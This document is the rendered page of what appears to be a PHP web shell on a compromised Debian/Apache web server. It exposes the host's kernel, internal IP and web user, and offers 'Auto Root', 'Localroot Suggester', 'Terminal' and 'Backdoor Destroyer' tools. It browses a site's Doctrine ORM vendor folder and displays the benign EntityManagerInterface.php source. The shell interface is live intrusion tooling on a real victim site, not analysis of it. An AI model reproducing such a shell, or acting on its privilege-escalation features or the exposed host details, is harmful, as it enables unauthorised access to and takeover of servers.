Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.217.117
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
v3.cesa.co.za /
vendor /
doctrine /
orm /
src /
Delete
Unzip
Name
Size
Permission
Date
Action
Cache
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Decorator
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Event
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Exception
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Id
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Internal
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Mapping
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Persisters
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Proxy
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Query
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Repository
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Tools
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
Utility
[ DIR ]
drwxrwxr-x
2026-08-17 03:12
.htaccess
237
B
-r-xr-xr-x
2026-08-17 03:12
AbstractQuery.php
40.83
KB
-rwxrwxr-x
2026-04-02 06:18
Cache.php
4.71
KB
-rwxrwxr-x
2026-04-02 06:18
Configuration.php
35.73
KB
-rwxrwxr-x
2026-04-02 06:18
EntityManager.php
31.96
KB
-rwxrwxr-x
2026-04-02 06:18
EntityManagerInterface.php
9.59
KB
-rwxrwxr-x
2026-04-02 06:18
EntityNotFoundException.php
1.06
KB
-rwxrwxr-x
2026-04-02 06:18
EntityRepository.php
10.99
KB
-rwxrwxr-x
2026-04-02 06:18
Events.php
3.93
KB
-rwxrwxr-x
2026-04-02 06:18
LazyCriteriaCollection.php
2.88
KB
-rwxrwxr-x
2026-04-02 06:18
NativeQuery.php
1.76
KB
-rwxrwxr-x
2026-04-02 06:18
NoResultException.php
356
B
-rwxrwxr-x
2026-04-02 06:18
NonUniqueResultException.php
468
B
-rwxrwxr-x
2026-04-02 06:18
ORMException.php
8.82
KB
-rwxrwxr-x
2026-04-02 06:18
ORMInvalidArgumentException.php
10.34
KB
-rwxrwxr-x
2026-04-02 06:18
ORMSetup.php
6.88
KB
-rwxrwxr-x
2026-04-02 06:18
OptimisticLockException.php
2.03
KB
-rwxrwxr-x
2026-04-02 06:18
PersistentCollection.php
21.18
KB
-rwxrwxr-x
2026-04-02 06:18
PessimisticLockException.php
309
B
-rwxrwxr-x
2026-04-02 06:18
Query.php
24.43
KB
-rwxrwxr-x
2026-04-02 06:18
QueryBuilder.php
44.52
KB
-rwxrwxr-x
2026-04-02 06:18
TransactionRequiredException.php
496
B
-rwxrwxr-x
2026-04-02 06:18
UnexpectedResultException.php
209
B
-rwxrwxr-x
2026-04-02 06:18
UnitOfWork.php
145.19
KB
-rwxrwxr-x
2026-04-02 06:18
Version.php
962
B
-rwxrwxr-x
2026-04-02 06:18
Save
Rename
<?php declare(strict_types=1); namespace Doctrine\ORM; use BadMethodCallException; use DateTimeInterface; use Doctrine\Common\EventManager; use Doctrine\DBAL\Connection; use Doctrine\DBAL\LockMode; use Doctrine\ORM\Exception\ORMException; use Doctrine\ORM\Internal\Hydration\AbstractHydrator; use Doctrine\ORM\Proxy\ProxyFactory; use Doctrine\ORM\Query\Expr; use Doctrine\ORM\Query\FilterCollection; use Doctrine\ORM\Query\ResultSetMapping; use Doctrine\Persistence\ObjectManager; /** * EntityManager interface * * @method Mapping\ClassMetadataFactory getMetadataFactory() * @method mixed wrapInTransaction(callable $func) * @method void refresh(object $object, ?int $lockMode = null) */ interface EntityManagerInterface extends ObjectManager { /** * {@inheritDoc} * * @param class-string<T> $className * * @return EntityRepository<T> * * @template T of object */ public function getRepository($className); /** * Returns the cache API for managing the second level cache regions or NULL if the cache is not enabled. * * @return Cache|null */ public function getCache(); /** * Gets the database connection object used by the EntityManager. * * @return Connection */ public function getConnection(); /** * Gets an ExpressionBuilder used for object-oriented construction of query expressions. * * Example: * * <code> * $qb = $em->createQueryBuilder(); * $expr = $em->getExpressionBuilder(); * $qb->select('u')->from('User', 'u') * ->where($expr->orX($expr->eq('u.id', 1), $expr->eq('u.id', 2))); * </code> * * @return Expr */ public function getExpressionBuilder(); /** * Starts a transaction on the underlying database connection. * * @return void */ public function beginTransaction(); /** * Executes a function in a transaction. * * The function gets passed this EntityManager instance as an (optional) parameter. * * {@link flush} is invoked prior to transaction commit. * * If an exception occurs during execution of the function or flushing or transaction commit, * the transaction is rolled back, the EntityManager closed and the exception re-thrown. * * @deprecated 2.10 Use {@link wrapInTransaction} instead. * * @param callable $func The function to execute transactionally. * * @return mixed The non-empty value returned from the closure or true instead. */ public function transactional($func); /** * Executes a function in a transaction. * * The function gets passed this EntityManager instance as an (optional) parameter. * * {@link flush} is invoked prior to transaction commit. * * If an exception occurs during execution of the function or flushing or transaction commit, * the transaction is rolled back, the EntityManager closed and the exception re-thrown. * * @param callable(self): T $func The function to execute transactionally. * * @return T The value returned from the closure. * * @template T */ // public function wrapInTransaction(callable $func); /** * Commits a transaction on the underlying database connection. * * @return void */ public function commit(); /** * Performs a rollback on the underlying database connection. * * @return void */ public function rollback(); /** * Creates a new Query object. * * @param string $dql The DQL string. * * @return Query */ public function createQuery($dql = ''); /** * Creates a Query from a named query. * * @param string $name * * @return Query */ public function createNamedQuery($name); /** * Creates a native SQL query. * * @param string $sql * @param ResultSetMapping $rsm The ResultSetMapping to use. * * @return NativeQuery */ public function createNativeQuery($sql, ResultSetMapping $rsm); /** * Creates a NativeQuery from a named native query. * * @param string $name * * @return NativeQuery */ public function createNamedNativeQuery($name); /** * Create a QueryBuilder instance * * @return QueryBuilder */ public function createQueryBuilder(); /** * Gets a reference to the entity identified by the given type and identifier * without actually loading it, if the entity is not yet loaded. * * @param class-string<T> $entityName The name of the entity type. * @param mixed $id The entity identifier. * * @return T|null The entity reference. * * @throws ORMException * * @template T */ public function getReference($entityName, $id); /** * Gets a partial reference to the entity identified by the given type and identifier * without actually loading it, if the entity is not yet loaded. * * The returned reference may be a partial object if the entity is not yet loaded/managed. * If it is a partial object it will not initialize the rest of the entity state on access. * Thus you can only ever safely access the identifier of an entity obtained through * this method. * * The use-cases for partial references involve maintaining bidirectional associations * without loading one side of the association or to update an entity without loading it. * Note, however, that in the latter case the original (persistent) entity data will * never be visible to the application (especially not event listeners) as it will * never be loaded in the first place. * * @deprecated 2.7 This method is being removed from the ORM and won't have any replacement * * @param class-string<T> $entityName The name of the entity type. * @param mixed $identifier The entity identifier. * * @return T|null The (partial) entity reference * * @template T */ public function getPartialReference($entityName, $identifier); /** * Closes the EntityManager. All entities that are currently managed * by this EntityManager become detached. The EntityManager may no longer * be used after it is closed. * * @return void */ public function close(); /** * Creates a copy of the given entity. Can create a shallow or a deep copy. * * @deprecated 2.7 This method is being removed from the ORM and won't have any replacement * * @param object $entity The entity to copy. * @param bool $deep FALSE for a shallow copy, TRUE for a deep copy. * * @return object The new entity. * * @throws BadMethodCallException */ public function copy($entity, $deep = false); /** * Acquire a lock on the given entity. * * @param object $entity * @param int $lockMode * @param int|DateTimeInterface|null $lockVersion * @phpstan-param LockMode::* $lockMode * * @return void * * @throws OptimisticLockException * @throws PessimisticLockException */ public function lock($entity, $lockMode, $lockVersion = null); /** * Gets the EventManager used by the EntityManager. * * @return EventManager */ public function getEventManager(); /** * Gets the Configuration used by the EntityManager. * * @return Configuration */ public function getConfiguration(); /** * Check if the Entity manager is open or closed. * * @return bool */ public function isOpen(); /** * Gets the UnitOfWork used by the EntityManager to coordinate operations. * * @return UnitOfWork */ public function getUnitOfWork(); /** * Gets a hydrator for the given hydration mode. * * This method caches the hydrator instances which is used for all queries that don't * selectively iterate over the result. * * @deprecated * * @param string|int $hydrationMode * @phpstan-param string|AbstractQuery::HYDRATE_* $hydrationMode * * @return AbstractHydrator */ public function getHydrator($hydrationMode); /** * Create a new instance for the given hydration mode. * * @param string|int $hydrationMode * @phpstan-param string|AbstractQuery::HYDRATE_* $hydrationMode * * @return AbstractHydrator * * @throws ORMException */ public function newHydrator($hydrationMode); /** * Gets the proxy factory used by the EntityManager to create entity proxies. * * @return ProxyFactory */ public function getProxyFactory(); /** * Gets the enabled filters. * * @return FilterCollection The active filter collection. */ public function getFilters(); /** * Checks whether the state of the filter collection is clean. * * @return bool True, if the filter collection is clean. */ public function isFiltersStateClean(); /** * Checks whether the Entity Manager has filters. * * @return bool True, if the EM has a filter collection. */ public function hasFilters(); /** * {@inheritDoc} * * @param string|class-string<T> $className * * @return Mapping\ClassMetadata * @phpstan-return ($className is class-string<T> ? Mapping\ClassMetadata<T> : Mapping\ClassMetadata<object>) * * @phpstan-template T of object */ public function getClassMetadata($className); }